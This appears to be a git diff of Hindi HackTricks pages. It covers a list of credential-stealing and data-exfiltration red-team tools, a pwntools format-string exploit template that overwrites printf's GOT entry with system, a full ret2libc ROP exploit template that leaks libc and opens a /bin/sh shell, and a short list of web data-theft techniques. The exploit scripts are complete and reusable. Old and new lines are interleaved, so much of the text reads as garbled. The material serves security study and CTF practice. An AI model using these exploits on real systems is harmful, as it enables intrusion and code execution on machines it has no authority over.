* यदि आप अपनी **कंपनी का विज्ञापन HackTricks में देखना चाहते हैं** या **HackTricks को PDF में डाउनलोड करना चाहते हैं** तो [**सब्सक्रिप्शन प्लान्स देखें**](https://github.com/sponsors/carlospolop)! * **हैकिंग ट्रिक्स साझा करें, हैकट्रिक्स**](https://github.com/carlospolop/hacktricks) और [**हैकट्रिक्स क्लाउड**](https://github.com/carlospolop/hacktricks-cloud) github रेपो में PR जमा करके।
* [**आधिकारिक PEASS और HackTricks स्वैग**](https://peass.creator-spring.com) प्राप्त करें
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) संग्रह
* **शामिल हों** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या हमें **ट्विटर** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)** पर **फॉलो** करें।
* **अपने हैकिंग ट्रिक्स साझा करें द्वारा PRs सबमिट करके** [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
</details> </details>
{% endhint %}

View file

@ -1,41 +1,28 @@
<details> {% hint style="success" %}
सीखें और प्रैक्टिस करें AWS हैकिंग:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks प्रशिक्षण AWS रेड टीम एक्सपर्ट (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
<summary><strong>AWS हैकिंग सीखें शून्य से लेकर हीरो तक</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong> के साथ!</strong></summary> सीखें और प्रैक्टिस करें GCP हैकिंग: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks प्रशिक्षण GCP रेड टीम एक्सपर्ट (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
HackTricks का समर्थन करने के अन्य तरीके:
* यदि आप चाहते हैं कि आपकी **कंपनी का विज्ञापन HackTricks में दिखाई दे** या **HackTricks को PDF में डाउनलोड करें** तो [**सब्सक्रिप्शन प्लान्स**](https://github.com/sponsors/carlospolop) देखें!
* [**आधिकारिक PEASS & HackTricks स्वैग प्राप्त करें**](https://peass.creator-spring.com)
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) संग्रह
* 💬 [**Discord समूह**](https://discord.gg/hRep4RUj7f) में **शामिल हों** या [**telegram समूह**](https://t.me/peass) या **Twitter** 🐦 पर मुझे **फॉलो** करें [**@carlospolopm**](https://twitter.com/carlospolopm)**.**
* [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github रेपोज़ में PRs सबमिट करके अपनी हैकिंग ट्रिक्स साझा करें.
</details>
## **Local l00t**
* [**PEASS-ng**](https://github.com/carlospolop/PEASS-ng): ये स्क्रिप्ट्स, PE वेक्टर्स की खोज के अलावा, फाइलसिस्टम के अंदर संवेदनशील जानकारी की खोज करेंगी।
* [**LaZagne**](https://github.com/AlessandroZ/LaZagne): **LaZagne प्रोजेक्ट** एक ओपन सोर्स एप्लिकेशन है जिसका उपयोग एक स्थानीय कंप्यूटर पर संग्रहीत बहुत सारे पासवर्ड्स को पुनः प्राप्त करने के लिए किया जाता है। प्रत्येक सॉफ्टवेयर अपने पासवर्ड्स को विभिन्न तकनीकों (plaintext, APIs, कस्टम एल्गोरिदम, डेटाबेस, आदि) का उपयोग करके संग्रहीत करता है। यह टूल सबसे अधिक प्रयुक्त सॉफ्टवेयर के लिए इन पासवर्ड्स को खोजने के उद्देश्य से विकसित किया गया है।
## **External Services**
* [**Conf-Thief**](https://github.com/antman1p/Conf-Thief): यह मॉड्यूल Confluence के API से एक्सेस टोकन का उपयोग करके कनेक्ट होगा, PDF में निर्यात करेगा, और उन Confluence दस्तावेजों को डाउनलोड करेगा जिन तक लक्ष्य की पहुँच है।
* [**GD-Thief**](https://github.com/antman1p/GD-Thief): यह एक Red Team टूल है जो आपके (हमलावर) द्वारा पहुँच योग्य लक्ष्य के Google Drive से फाइलों को निकालने के लिए Google Drive API का उपयोग करता है। इसमें सभी साझा की गई फाइलें, साझा ड्राइव्स से सभी फाइलें, और डोमेन ड्राइव्स से सभी फाइलें शामिल हैं जिन तक लक्ष्य की पहुँच है।
* [**GDir-Thief**](https://github.com/antman1p/GDir-Thief): यह एक Red Team टूल है जो लक्ष्य संगठन की Google People Directory को निकालने के लिए Google के People API का उपयोग करता है जिस तक आपकी पहुँच है।
* [**SlackPirate**](https://github.com/emtunc/SlackPirate)**:** यह एक Python में विकसित टूल है जो एक Slack workspace से 'रोचक' जानकारी निकालने के लिए मूल Slack APIs का उपयोग करता है, बशर्ते एक्सेस टोकन दिया गया हो।
* [**Slackhound**](https://github.com/BojackThePillager/Slackhound): Slackhound एक कमांड लाइन टूल है जो लाल और नीली टीमों को एक Slack workspace/संगठन की त्वरित रेकी करने के लिए है। Slackhound एक संगठन के उपयोगकर्ताओं, फाइलों, संदेशों, आदि का संग्रह जल्दी से खोज योग्य बनाता है और बड़ी वस्तुओं को ऑफलाइन समीक्षा के लिए CSV में लिखा जाता है।
<details> <details>
<summary><strong>AWS हैकिंग सीखें शून्य से लेकर हीरो तक</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong> के साथ!</strong></summary> <summary>हैकट्रिक्स का समर्थन करें</summary>
HackTricks का समर्थन करने के अन्य तरीके: * [**सब्सक्रिप्शन प्लान**](https://github.com/sponsors/carlospolop) की जाँच करें!
* **शामिल हों** 💬 [**डिस्कॉर्ड ग्रुप**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम ग्रुप**](https://t.me/peass) या **ट्विटर** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)** पर हमें फॉलो करें**.
* यदि आप चाहते हैं कि आपकी **कंपनी का विज्ञापन HackTricks में दिखाई दे** या **HackTricks को PDF में डाउनलोड करें** तो [**सब्सक्रिप्शन प्लान्स**](https://github.com/sponsors/carlospolop) देखें! * **हैकिंग ट्रिक्स साझा करें एक PR जमा करके** [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github रेपो में।
* [**आधिकारिक PEASS & HackTricks स्वैग प्राप्त करें**](https://peass.creator-spring.com)
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) संग्रह
* 💬 [**Discord समूह**](https://discord.gg/hRep4RUj7f) में **शामिल हों** या [**telegram समूह**](https://t.me/peass) या **Twitter** 🐦 पर मुझे **फॉलो** करें [**@carlospolopm**](https://twitter.com/carlospolopm)**.**
* [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github रेपोज़ में PRs सबमिट करके अपनी हैकिंग ट्रिक्स साझा करें.
</details> </details>
{% endhint %}
## **स्थानीय लूट**
* [**PEASS-ng**](https://github.com/carlospolop/PEASS-ng): ये स्क्रिप्ट, PE वेक्टर्स की खोज के अलावा, फाइल सिस्टम के अंदर संवेदनशील जानकारी की खोज करेंगे।
* [**LaZagne**](https://github.com/AlessandroZ/LaZagne): **LaZagne प्रोजेक्ट** एक ओपन सोर्स एप्लिकेशन है जिसका उपयोग स्थानीय कंप्यूटर पर स्टोर की गई कई पासवर्ड्स को पुनः प्राप्त करने के लिए किया जाता है। प्रत्येक सॉफ्टवेयर अलग-अलग तकनीकों (सादा पाठ, एपीआई, कस्टम एल्गोरिदम्स, डेटाबेस आदि) का उपयोग करके अपने पासवर्ड्स को स्टोर करता है। इस टूल का विकास इन पासवर्ड्स को खोजने के उद्देश्य से किया गया है जो सबसे अधिक प्रयोग किए जाने वाले सॉफ्टवेयर के लिए।
## **बाह्य सेवाएं**
* [**Conf-Thief**](https://github.com/antman1p/Conf-Thief): यह मॉड्यूल Confluence की एपीआई से कनेक्ट होगा, पीडीएफ में निर्यात करेगा, और उन Confluence दस्तावेज़ों को डाउनलोड करेगा जिनका लक्ष्य है कि लक्ष्य का पहुंच है।
* [**GD-Thief**](https://github.com/antman1p/GD-Thief): रेड टीम टूल एक लक्ष्य के Google Drive से फ़ाइलों को बाहर निकालने के लिए जिसका आपका पहुंच है, Google Drive एपीआई के माध्यम से। इसमें सभी साझा फ़ाइलें, साझा ड्राइव से सभी फ़ाइलें, और डोमेन ड्राइव से सभी फ़ाइलें शामिल हैं जिनका लक्ष्य पहुंच है।
* [**GDir-Thief**](https://github.com/antman1p/GDir-Thief): रेड टीम टूल जिसका उपयोग Google के लोगों की डायरेक्टरी को बाहर निकालने के लिए किया जाता है, जिसका आपका पहुंच है, Google के लोगों की एपीआई के माध्यम से।
* [**SlackPirate**](https://github.com/emtunc/SlackPirate)**:** यह एक टूल है जो पायथन में विकसित किया गया है जो एक एक्सेस टोकन देता है और एक स्लैक वर्कस्पेस से 'दिलचस्प' जानकारी निकालने के लिए नेटिव स्लैक एपीआई का उपयोग करता है।
* [**Slackhound**](https://github.com/BojackThePillager/Slackhound): Slackhound एक कमांड लाइन टूल है जो रेड और ब्लू टीमों को एक स्लैक वर्कस्पेस/संगठन की जांच तेजी से करने के लिए है। Slackhound संगठन के उपयोगकर्ताओं, फ़ाइलों, संदेशों आदि का संग्रहण तेजी से खोजने में मदद करता है और बड़े ऑब्जेक्ट्स को ऑफलाइन समीक्षा के लिए सीएसवी में लिखा जाता है।

View file

@ -1,2 +1,166 @@
# Format Strings Template {% hint style="success" %}
सीखें और प्रैक्टिस करें AWS हैकिंग: <img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks प्रशिक्षण AWS रेड टीम एक्सपर्ट (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
सीखें और प्रैक्टिस करें GCP हैकिंग: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks प्रशिक्षण GCP रेड टीम एक्सपर्ट (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary>हैकट्रिक्स का समर्थन करें</summary>
* [**सब्सक्रिप्शन प्लान**](https://github.com/sponsors/carlospolop) की जाँच करें!
* **शामिल हों** 💬 [**डिस्कॉर्ड ग्रुप**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम ग्रुप**](https://t.me/peass) या हमें **ट्विटर** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)** पर फॉलो** करें।
* **हैकिंग ट्रिक्स साझा करें, हैकट्रिक्स** [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github रेपो में PR जमा करके।
</details>
{% endhint %}
```python
from pwn import *
from time import sleep
###################
### CONNECTION ####
###################
# Define how you want to exploit the binary
LOCAL = True
REMOTETTCP = False
REMOTESSH = False
GDB = False
# Configure vulnerable binary
LOCAL_BIN = "./tyler"
REMOTE_BIN = "./tyler" #For ssh
# In order to exploit the format string you may need to append/prepend some string to the payload
# configure them here
PREFIX_PAYLOAD = b""
SUFFIX_PAYLOAD = b""
NNUM_ALREADY_WRITTEN_BYTES = 0
MAX_LENTGH = 999999 #Big num if not restricted
print(" ====================== ")
print("Selected options:")
print(f"PREFIX_PAYLOAD: {PREFIX_PAYLOAD}")
print(f"SUFFIX_PAYLOAD: {SUFFIX_PAYLOAD}")
print(f"NNUM_ALREADY_WRITTEN_BYTES: {NNUM_ALREADY_WRITTEN_BYTES}")
print(" ====================== ")
def connect_binary():
global P, ELF_LOADED, ROP_LOADED
if LOCAL:
P = process(LOCAL_BIN) # start the vuln binary
ELF_LOADED = ELF(LOCAL_BIN)# Extract data from binary
ROP_LOADED = ROP(ELF_LOADED)# Find ROP gadgets
elif REMOTETTCP:
P = remote('10.10.10.10',1338) # start the vuln binary
ELF_LOADED = ELF(LOCAL_BIN)# Extract data from binary
ROP_LOADED = ROP(ELF_LOADED)# Find ROP gadgets
elif REMOTESSH:
ssh_shell = ssh('bandit0', 'bandit.labs.overthewire.org', password='bandit0', port=2220)
P = ssh_shell.process(REMOTE_BIN) # start the vuln binary
ELF_LOADED = ELF(LOCAL_BIN)# Extract data from binary
ROP_LOADED = ROP(elf)# Find ROP gadgets
#######################################
### Get format string configuration ###
#######################################
def send_payload(payload):
payload = PREFIX_PAYLOAD + payload + SUFFIX_PAYLOAD
log.info("payload = %s" % repr(payload))
if len(payload) > MAX_LENTGH: print("!!!!!!!!! ERROR, MAX LENGTH EXCEEDED")
P.sendline(payload)
sleep(0.5)
return P.recv()
def get_formatstring_config():
global P
for offset in range(1,1000):
connect_binary()
P.clean()
payload = b"AAAA%" + bytes(str(offset), "utf-8") + b"$p"
recieved = send_payload(payload).strip()
if b"41" in recieved:
for padlen in range(0,4):
if b"41414141" in recieved:
connect_binary()
payload = b" "*padlen + b"BBBB%" + bytes(str(offset), "utf-8") + b"$p"
recieved = send_payload(payload).strip()
print(recieved)
if b"42424242" in recieved:
log.info(f"Found offset ({offset}) and padlen ({padlen})")
return offset, padlen
else:
connect_binary()
payload = b" " + payload
recieved = send_payload(payload).strip()
# In order to exploit a format string you need to find a position where part of your payload
# is being reflected. Then, you will be able to put in the position arbitrary addresses
# and write arbitrary content in those addresses
# Therefore, the function get_formatstring_config will find the offset and padd needed to exploit the format string
offset, padlen = get_formatstring_config()
# In this template, the GOT of printf (the part of the GOT table that points to where the printf
# function resides) is going to be modified by the address of the system inside the PLT (the
# part of the code that will jump to the system function).
# Therefore, next time the printf function is executed, system will be executed instead with the same
# parameters passed to printf
# In some scenarios you will need to loop1 more time to the vulnerability
# In that cases you need to overwrite a pointer in the .fini_array for example
# Uncomment the commented code below to gain 1 rexecution extra
#P_FINI_ARRAY = ELF_LOADED.symbols["__init_array_end"] # .fini_array address
#INIT_LOOP_ADDR = 0x8048614 # Address to go back
SYSTEM_PLT = ELF_LOADED.plt["system"]
P_GOT = ELF_LOADED.got["printf"]
#log.info(f"Init loop address: {hex(INIT_LOOP_ADDR)}")
#log.info(f"fini.array address: {hex(P_FINI_ARRAY)}")
log.info(f"System PLT address: {hex(SYSTEM_PLT)}")
log.info(f"Printf GOT address: {hex(P_GOT)}")
connect_binary()
if GDB and not REMOTETTCP and not REMOTESSH:
# attach gdb and continue
# You can set breakpoints, for example "break *main"
gdb.attach(P.pid, "b *main") #Add more breaks separeted by "\n"
sleep(5)
format_string = FmtStr(execute_fmt=send_payload, offset=offset, padlen=padlen, numbwritten=NNUM_ALREADY_WRITTEN_BYTES)
#format_string.write(P_FINI_ARRAY, INIT_LOOP_ADDR)
format_string.write(P_GOT, SYSTEM_PLT)
format_string.execute_writes()
# Now that printf function is executing system you just need to find a place where you can
# control the parameters passed to printf to execute arbitrary code.
P.interactive()
```
{% hint style="success" %}
सीखें और प्रैक्टिस करें AWS हैकिंग: <img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks प्रशिक्षण AWS रेड टीम एक्सपर्ट (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
सीखें और प्रैक्टिस करें GCP हैकिंग: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks प्रशिक्षण GCP रेड टीम एक्सपर्ट (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary>हैकट्रिक्स का समर्थन करें</summary>
* [**सदस्यता योजनाएं**](https://github.com/sponsors/carlospolop) की जाँच करें!
* **शामिल हों** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या हमें **ट्विटर** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)** पर फॉलो** करें।
* **हैकिंग ट्रिक्स साझा करें, हैकट्रिक्स**](https://github.com/carlospolop/hacktricks) और [**हैकट्रिक्स क्लाउड**](https://github.com/carlospolop/hacktricks-cloud) github रेपो में PR जमा करके।
</details>
{% endhint %}

View file

@ -0,0 +1,242 @@
{% hint style="success" %}
सीखें और प्रैक्टिस करें AWS हैकिंग: <img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks प्रशिक्षण AWS रेड टीम एक्सपर्ट (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
सीखें और प्रैक्टिस करें GCP हैकिंग: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks प्रशिक्षण GCP रेड टीम एक्सपर्ट (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary>हैकट्रिक्स का समर्थन करें</summary>
* [**सदस्यता योजनाएं**](https://github.com/sponsors/carlospolop) की जाँच करें!
* 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) में शामिल हों या हमें ट्विटर पर फॉलो करें 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github रेपो में PR जमा करके हैकिंग ट्रिक्स साझा करें।
</details>
{% endhint %}
{% code title="template.py" %}
```python
from pwn import ELF, process, ROP, remote, ssh, gdb, cyclic, cyclic_find, log, p64, u64 # Import pwntools
###################
### CONNECTION ####
###################
LOCAL = False
REMOTETTCP = True
REMOTESSH = False
GDB = False
USE_ONE_GADGET = False
LOCAL_BIN = "./vuln"
REMOTE_BIN = "~/vuln" #For ssh
LIBC = "" #ELF("/lib/x86_64-linux-gnu/libc.so.6") #Set library path when know it
ENV = {"LD_PRELOAD": LIBC} if LIBC else {}
if LOCAL:
P = process(LOCAL_BIN, env=ENV) # start the vuln binary
ELF_LOADED = ELF(LOCAL_BIN)# Extract data from binary
ROP_LOADED = ROP(ELF_LOADED)# Find ROP gadgets
elif REMOTETTCP:
P = remote('10.10.10.10',1339) # start the vuln binary
ELF_LOADED = ELF(LOCAL_BIN)# Extract data from binary
ROP_LOADED = ROP(ELF_LOADED)# Find ROP gadgets
elif REMOTESSH:
ssh_shell = ssh('bandit0', 'bandit.labs.overthewire.org', password='bandit0', port=2220)
p = ssh_shell.process(REMOTE_BIN) # start the vuln binary
elf = ELF(LOCAL_BIN)# Extract data from binary
rop = ROP(elf)# Find ROP gadgets
if GDB and not REMOTETTCP and not REMOTESSH:
# attach gdb and continue
# You can set breakpoints, for example "break *main"
gdb.attach(P.pid, "b *main")
#########################
#### OFFSET FINDER ######
#########################
OFFSET = b"" #b"A"*264
if OFFSET == b"":
gdb.attach(P.pid, "c") #Attach and continue
payload = cyclic(264)
payload += b"AAAAAAAA"
print(P.clean())
P.sendline(payload)
#x/wx $rsp -- Search for bytes that crashed the application
#print(cyclic_find(0x63616171)) # Find the offset of those bytes
P.interactive()
exit()
####################
### Find Gadgets ###
####################
try:
libc_func = "puts"
PUTS_PLT = ELF_LOADED.plt['puts'] #PUTS_PLT = ELF_LOADED.symbols["puts"] # This is also valid to call puts
except:
libc_func = "printf"
PUTS_PLT = ELF_LOADED.plt['printf']
MAIN_PLT = ELF_LOADED.symbols['main']
POP_RDI = (ROP_LOADED.find_gadget(['pop rdi', 'ret']))[0] #Same as ROPgadget --binary vuln | grep "pop rdi"
RET = (ROP_LOADED.find_gadget(['ret']))[0]
log.info("Main start: " + hex(MAIN_PLT))
log.info("Puts plt: " + hex(PUTS_PLT))
log.info("pop rdi; ret gadget: " + hex(POP_RDI))
log.info("ret gadget: " + hex(RET))
########################
### Find LIBC offset ###
########################
def generate_payload_aligned(rop):
payload1 = OFFSET + rop
if (len(payload1) % 16) == 0:
return payload1
else:
payload2 = OFFSET + p64(RET) + rop
if (len(payload2) % 16) == 0:
log.info("Payload aligned successfully")
return payload2
else:
log.warning(f"I couldn't align the payload! Len: {len(payload1)}")
return payload1
def get_addr(libc_func):
FUNC_GOT = ELF_LOADED.got[libc_func]
log.info(libc_func + " GOT @ " + hex(FUNC_GOT))
# Create rop chain
rop1 = p64(POP_RDI) + p64(FUNC_GOT) + p64(PUTS_PLT) + p64(MAIN_PLT)
rop1 = generate_payload_aligned(rop1)
# Send our rop-chain payload
#P.sendlineafter("dah?", rop1) #Use this to send the payload when something is received
print(P.clean()) # clean socket buffer (read all and print)
P.sendline(rop1)
# If binary is echoing back the payload, remove that message
recieved = P.recvline().strip()
if OFFSET[:30] in recieved:
recieved = P.recvline().strip()
# Parse leaked address
log.info(f"Len rop1: {len(rop1)}")
leak = u64(recieved.ljust(8, b"\x00"))
log.info(f"Leaked LIBC address, {libc_func}: {hex(leak)}")
# Set lib base address
if LIBC:
LIBC.address = leak - LIBC.symbols[libc_func] #Save LIBC base
print("If LIBC base doesn't end end 00, you might be using an icorrect libc library")
log.info("LIBC base @ %s" % hex(LIBC.address))
# If not LIBC yet, stop here
else:
print("TO CONTINUE) Find the LIBC library and continue with the exploit... (https://LIBC.blukat.me/)")
P.interactive()
return hex(leak)
get_addr(libc_func) #Search for puts address in memmory to obtain LIBC base
#############################
#### FINAL EXPLOITATION #####
#############################
## Via One_gadget (https://github.com/david942j/one_gadget)
# gem install one_gadget
def get_one_gadgets(libc):
import string, subprocess
args = ["one_gadget", "-r"]
if len(libc) == 40 and all(x in string.hexdigits for x in libc.hex()):
args += ["-b", libc.hex()]
else:
args += [libc]
try:
one_gadgets = [int(offset) for offset in subprocess.check_output(args).decode('ascii').strip().split()]
except:
print("One_gadget isn't installed")
one_gadgets = []
return
rop2 = b""
if USE_ONE_GADGET:
one_gadgets = get_one_gadgets(LIBC)
if one_gadgets:
rop2 = p64(one_gadgets[0]) + "\x00"*100 #Usually this will fullfit the constrains
## Normal/Long exploitation
if not rop2:
BINSH = next(LIBC.search(b"/bin/sh")) #Verify with find /bin/sh
SYSTEM = LIBC.sym["system"]
EXIT = LIBC.sym["exit"]
log.info("POP_RDI %s " % hex(POP_RDI))
log.info("bin/sh %s " % hex(BINSH))
log.info("system %s " % hex(SYSTEM))
log.info("exit %s " % hex(EXIT))
rop2 = p64(POP_RDI) + p64(BINSH) + p64(SYSTEM) #p64(EXIT)
rop2 = generate_payload_aligned(rop2)
print(P.clean())
P.sendline(rop2)
P.interactive() #Interact with your shell :)
```
{% endcode %}
# सामान्य समस्याएँ
## MAIN_PLT = elf.symbols\['main'] नहीं मिला
यदि "main" प्रतीक मौजूद नहीं है (संभावित रूप से इसलिए कि यह एक स्ट्रिप्ड बाइनरी है)। तो आप बस यहाँ मुख्य कोड कहाँ है देख सकते हैं:
```python
objdump -d vuln_binary | grep "\.text"
Disassembly of section .text:
0000000000401080 <.text>:
```
और पता मैन्युअल रूप से सेट करें:
```python
MAIN_PLT = 0x401080
```
## Puts नहीं मिला
यदि बाइनरी Puts का उपयोग नहीं कर रहा है तो आपको यह जांचनी चाहिए कि क्या यह इस्तेमाल कर रहा है
## `sh: 1: %s%s%s%s%s%s%s%s: not found`
यदि आप इस **त्रुटि** को पाते हैं जब आप **सभी** एक्सप्लॉइट बनाने के बाद: `sh: 1: %s%s%s%s%s%s%s%s: not found`
तो कोशिश करें कि **"/bin/sh" के पते को 64 बाइट कम करें**:
```python
BINSH = next(libc.search("/bin/sh")) - 64
```
{% hint style="success" %}
**एडब्ल्यूएस हैकिंग सीखें और अभ्यास करें:**<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks प्रशिक्षण एडब्ल्यूएस रेड टीम एक्सपर्ट (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
**जीसीपी हैकिंग सीखें और अभ्यास करें:** <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks प्रशिक्षण जीसीपी रेड टीम एक्सपर्ट (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary>हैकट्रिक्स का समर्थन करें</summary>
* [**सदस्यता योजनाएं**](https://github.com/sponsors/carlospolop) की जाँच करें!
* 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) में **शामिल हों** या हमें **ट्विटर** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)** पर फॉलो** करें।
* **हैकिंग ट्रिक्स साझा करें, हैकट्रिक्स** और [**हैकट्रिक्स क्लाउड**](https://github.com/carlospolop/hacktricks-cloud) github रेपो में पीआर जमा करके।
</details>
{% endhint %}

View file

@ -1,37 +1,39 @@
# वेब से संवेदनशील जानकारी की चोरी # वेब से संवेदनशील जानकारी फासवन
{% hint style="success" %}
AWS हैकिंग सीखें और अभ्यास करें:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks प्रशिक्षण AWS रेड टीम विशेषज्ञ (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
GCP हैकिंग सीखें और अभ्यास करें: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks प्रशिक्षण GCP रेड टीम विशेषज्ञ (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details> <details>
<summary><strong>htARTE (HackTricks AWS Red Team Expert) के साथ शून्य से नायक तक AWS हैकिंग सीखें</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary> <summary>हैकट्रिक्स का समर्थन करें</summary>
HackTricks का समर्थन करने के अन्य तरीके: * [**सदस्यता योजनाएं**](https://github.com/sponsors/carlospolop) की जाँच करें!
* **शामिल हों** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या **हमें** **ट्विटर** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)** पर **फॉलो** करें।
* यदि आप अपनी **कंपनी का विज्ञापन HackTricks में देखना चाहते हैं** या **HackTricks को PDF में डाउनलोड करना चाहते हैं** तो [**सब्सक्रिप्शन प्लान्स**](https://github.com/sponsors/carlospolop) देखें! * **हैकिंग ट्रिक्स साझा करें, PRs सबमिट करके** [**HackTricks**](https://github.com/carlospolop/hacktricks) **और** [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) **github रेपो में।**
* [**आधिकारिक PEASS & HackTricks स्वैग**](https://peass.creator-spring.com) प्राप्त करें
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) संग्रह
* 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) में शामिल हों या [**telegram group**](https://t.me/peass) में या **Twitter** 🐦 पर मुझे **फॉलो** करें [**@carlospolopm**](https://twitter.com/carlospolopm)**.**
* **HackTricks** के [**github repos**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) में PRs सबमिट करके अपनी हैकिंग ट्रिक्स साझा करें।
</details> </details>
{% endhint %}
यदि कभी आपको एक **वेब पेज मिलता है जो आपके सत्र के आधार पर आपको संवेदनशील जानकारी प्रस्तुत करता है**: शायद यह कुकीज को प्रतिबिंबित कर रहा है, या प्रिंटिंग या CC विवरण या कोई अन्य संवेदनशील जानकारी, आप इसे चुराने का प्रयास कर सकते हैं।\ यदि किसी समय आपको एक **वेब पृष्ठ मिलता है जो आपकी सत्र पर आधारित संवेदनशील जानकारी प्रस्तुत करता है**: शायद यह कुकीज को प्रतिबिंबित कर रहा है, या डिटेल्स या किसी अन्य संवेदनशील जानकारी को प्रिंट कर रहा है, तो आप इसे चुरा सकते हैं।\
यहाँ मैं आपको मुख्य तरीके प्रस्तुत करता हूँ जिनसे आप इसे हासिल करने का प्रयास कर सकते हैं: यहाँ मैं आपको इसे प्राप्त करने की प्रमुख तरीके प्रस्तुत करता हूँ:
* [**CORS bypass**](pentesting-web/cors-bypass.md): यदि आप CORS हेडर्स को बायपास कर सकते हैं तो आप एक दुर्भावनापूर्ण पेज के लिए Ajax अनुरोध करके जानकारी चुरा सकते हैं। * [**CORS बाईपास**](pentesting-web/cors-bypass.md): यदि आप CORS हेडर्स को बाईपास कर सकते हैं तो आप एक दुरुपयोगी पृष्ठ के लिए एजेक्स अनुरोध करके जानकारी चुरा सकते हैं।
* [**XSS**](pentesting-web/xss-cross-site-scripting/): यदि आप पेज पर XSS भेद्यता पाते हैं तो आप इसका दुरुपयोग करके जानकारी चुरा सकते हैं। * [**XSS**](pentesting-web/xss-cross-site-scripting/): यदि आप पृष्ठ पर XSS दोष पाते हैं तो आप इसका दुरुपयोग करके जानकारी चुरा सकते हैं।
* [**Danging Markup**](pentesting-web/dangling-markup-html-scriptless-injection/): यदि आप XSS टैग्स इंजेक्ट नहीं कर सकते हैं तो आप अन्य नियमित HTML टैग्स का उपयोग करके जानकारी चुरा सकते हैं। * [**डैंगलिंग मार्कअप**](pentesting-web/dangling-markup-html-scriptless-injection/): यदि आप XSS टैग नहीं इंजेक्ट कर सकते हैं तो आप अन्य साधारण HTML टैग का उपयोग करके जानकारी चुरा सकते हैं।
